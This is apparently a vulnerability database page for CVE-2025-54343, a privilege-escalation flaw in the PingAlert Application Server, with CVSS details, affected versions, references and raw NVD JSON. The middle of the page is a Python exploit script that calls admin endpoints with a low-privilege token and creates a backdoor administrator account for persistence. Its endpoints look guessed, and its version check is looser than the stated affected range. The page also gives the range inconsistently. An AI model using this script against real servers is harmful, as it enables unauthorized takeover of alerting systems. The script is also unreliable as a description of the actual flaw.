CVE-2025-54343

Description

An Incorrect Access Control vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 exploitable remotely for Escalation of Privileges.

CVSS Details

CVSS Score

9.6

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:desktopalert:pingalert_application_server:*:*:*:*:*:*:*:* - VULNERABLE

Desktop Alert PingAlert 6.1.0.11

Desktop Alert PingAlert 6.1.1.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-54343 PoC - Desktop Alert PingAlert Access Control Bypass # Target: Desktop Alert PingAlert Application Server # Affected Versions: 6.1.0.11 to 6.1.1.2 import requests import json TARGET_HOST = "http://target-server:8080" CVE_ID = "CVE-2025-54343" def exploit_privilege_escalation(target_host, low_priv_token): """ Exploit Incorrect Access Control vulnerability in PingAlert Application Server to escalate privileges from low-privilege user to administrator """ headers = { 'Authorization': f'Bearer {low_priv_token}', 'Content-Type': 'application/json', 'X-CVE-Research': CVE_ID } # Step 1: Attempt to access admin endpoint with low privilege token # The server should reject this request but due to the vulnerability it doesn't admin_endpoint = f"{target_host}/api/v1/admin/users" try: response = requests.get(admin_endpoint, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] VULNERABLE: Admin endpoint accessible with low privilege token") print(f"[+] Response: {response.text}") # Step 2: Create new admin user for persistence create_user_payload = { "username": "attacker_backdoor", "password": "P@ssw0rd123!", "role": "administrator", "email": "[email protected]" } create_response = requests.post( f"{target_host}/api/v1/admin/users/create", headers=headers, json=create_user_payload ) if create_response.status_code == 201: print("[+] SUCCESS: Backdoor admin user created") return True else: print(f"[-] NOT VULNERABLE or Token invalid: Status {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False def check_version(target_host): """Check if target is running vulnerable version""" try: response = requests.get(f"{target_host}/api/v1/system/version", timeout=10) if response.status_code == 200: version_info = response.json() version = version_info.get('version', '') print(f"[*] Target version: {version}") # Check if version is in vulnerable range version_parts = version.split('.') if len(version_parts) >= 3: major, minor, patch = int(version_parts[0]), int(version_parts[1]), int(version_parts[2]) if major == 6 and minor == 1 and 0 <= patch <= 1: return True return False except: return None if __name__ == "__main__": print(f"[*] CVE-2025-54343 Exploit - Desktop Alert PingAlert Access Control") print(f"[*] CVSS: 9.6 CRITICAL") print(f"[*] Target: {TARGET_HOST}") # First check version is_vulnerable = check_version(TARGET_HOST) if is_vulnerable: print("[+] Target appears to be running vulnerable version") elif is_vulnerable is False: print("[-] Target does not appear to be vulnerable") # Note: You need a valid low-privilege token to exploit # low_priv_token = "your_low_privilege_token_here" # exploit_privilege_escalation(TARGET_HOST, low_priv_token)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-54343
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-54343
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-54343/
[4] VulDB https://vuldb.com/cve/CVE-2025-54343
[5] https://desktopalert.net
[6] https://desktopalert.net/CVE-2025-54343/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-54343", "sourceIdentifier": "[email protected]", "published": "2025-11-14T18:15:48.563", "lastModified": "2025-11-19T21:27:52.237", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Incorrect Access Control vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 exploitable remotely for Escalation of Privileges."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 5.8}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:desktopalert:pingalert_application_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.0.11", "versionEndExcluding": "6.1.1.4", "matchCriteriaId": "3CE54623-DECB-4213-B299-40AAE561D3E2"}]}]}], "references": [{"url": "https://desktopalert.net", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://desktopalert.net/CVE-2025-54343/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}